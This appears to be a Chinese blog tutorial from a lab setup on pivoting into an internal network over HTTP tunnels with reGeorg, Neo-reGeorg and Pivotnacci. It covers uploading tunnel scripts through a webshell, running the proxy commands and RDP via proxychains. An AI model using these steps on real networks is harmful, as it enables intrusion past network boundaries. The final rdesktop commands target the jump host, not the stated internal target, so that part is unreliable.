内网隧道——HTTP隧道

文章目录

实验网络拓扑如下:

攻击机kali IP:192.168.111.0
跳板机win7 IP:192.168.111.128,192.168.52.143
靶机win server 2008 IP:192.168.52.138

攻击机与Web服务器彼此之间都可以进行直接通信,但是攻击机与靶机之间不能直接进行通信,目的:通过建立HHTP隧道转发的方式将攻击机连接上内部的靶机

一、ReGeorg

1、Web服务器是PHP环境,可以使用tunnel.nosocket.php脚本文件,上传文件到Web服务器网站根目录下。成功上传则通过http访问网站此脚本文件,可以看到部署成功,如图下图所示。

2、使用攻击机运行reGeorgSocksProxy.py文件, 执行下面的命令,连接tunnel.nosocket.php文件,攻击机的8888端口与受害机的80端口建立HTTP隧道,出现如下界面则证明隧道穿透成功。

bash 复制代码
python2 reGeorgSocksProxy.py -u http://192.168.111.128/tunnel.nosocket.php -p 8888

3、在kali中修改proxychains4.conf配置文件,并在其底部添加一行socks5 127.0.0.1 8888参数来完成 proxychains 代理配置,如下图所示。

bash 复制代码
vim /etc/proxychains4.conf

4、当配置完proxychains代理后,即可在攻击机执行下面命令来连接靶机,通过所建立的 socks协议隧道,直接远程连接到目标服务器。

bash 复制代码
proxychains rdesktop 192.168.111.128

二、Neo-reGeorg

Neo-regeorg可以说是Regeorg的重构版,也是一款很实用的WEB隧道工具,在Regeorg的基础上提高隧道的连接安全性、可用性、传输内容保密性,以应对更多的网络环境场景,工具依赖python3环境,它的原理与regeorg相似。

1、使用如下命令生成带有密码的服务器脚本文件。

bash 复制代码
python3 neoreg.py  generate -k test

2、通过webshell将tunnel.php文件上传Web服务器网站服务的根目录下。

3、Kali攻击机执行以下命令,此时隧道搭建成功。

bash 复制代码
python3 neoreg.py -k test -u http://192.168.111.128/tunnel.php -p 8888

4、在kali中修改proxychains4.conf配置文件,并在其底部添加一行socks5127.0.0.1 8888参数来完成 proxychains 代理配置,如下图所示。

bash 复制代码
vim /etc/proxychains4.conf

5、当配置完proxychains代理后,即可在攻击机执行下面命令来连接靶机,通过所建立的 socks协议隧道,直接远程连接到目标服务器。

bash 复制代码
proxychains rdesktop 192.168.111.128

三、Pivotnacci

1、下载完安装包解压后需要先初始化。

bash 复制代码
pip3 install -r requirements.txt 
python3 setup.py install

2、如果需要使用密码加密,可以在agents/agent.php文件中为AGENT_PASSWORD赋值,这里将密码设置为test

3、设置完成后将agent.php放置在网站根目录下,在攻击机执行

bash 复制代码
pivotnacci http://192.168.111.128/agent.php -p 6666 --password test -v

其中-p 6666是指定转发端口,--password是指自定义密码,执行成功则如图下图所示。

4、在kali中修改proxychains4.conf配置文件,并在其底部添加一行socks5 127.0.0.1 6666参数来完成 proxychains 代理配置,如下图所示。

bash 复制代码
vim /etc/proxychains4.conf

5、当配置完proxychains代理后,即可在攻击机执行下面命令来连接靶机,通过所建立的 socks协议隧道,直接远程连接到目标服务器。

bash 复制代码
proxychains rdesktop 192.168.111.128
相关推荐
小辰记事本1 小时前
从零读懂RoCEv2数据包构造:从WQE到线缆上的完整旅程
服务器·网络·网络协议·rdma
北京耐用通信2 小时前
全域适配工业场景耐达讯自动化Modbus TCP 转 PROFIBUS 网关轻松实现以太网与现场总线互通
网络·人工智能·网络协议·自动化·信息与通信
在角落发呆3 小时前
Linux转发配置:解锁网络互联的核心密码
linux·运维·网络
YMWM_5 小时前
UDP协议详解:从原理到Python实践
网络·网络协议·udp
pengyi8710155 小时前
共享 IP 与独享 IP 怎么选?被封后升级方案避坑
网络·网络协议·tcp/ip
YuanDaima20485 小时前
Linux 进阶运维与 AI 环境实战:进程管理、网络排错与 GPU 监控
linux·运维·服务器·网络·人工智能
凯勒姆7 小时前
网工网络设备原理及配置
网络·智能路由器
上海云盾-小余7 小时前
网站恶意爬虫拦截策略:智能识别与封禁实操方案
网络·爬虫·安全·web安全
xhbh6668 小时前
网关端口映射和路由器端口转发有什么区别?配置要点全解析
运维·服务器·网络·智能路由器·端口映射·映射·无痕网关
半壶清水8 小时前
用P4 Tutorial、BMv2 和 Mininet‌解析网络第一集------模拟环境搭建
运维·服务器·网络·网络协议·tcp/ip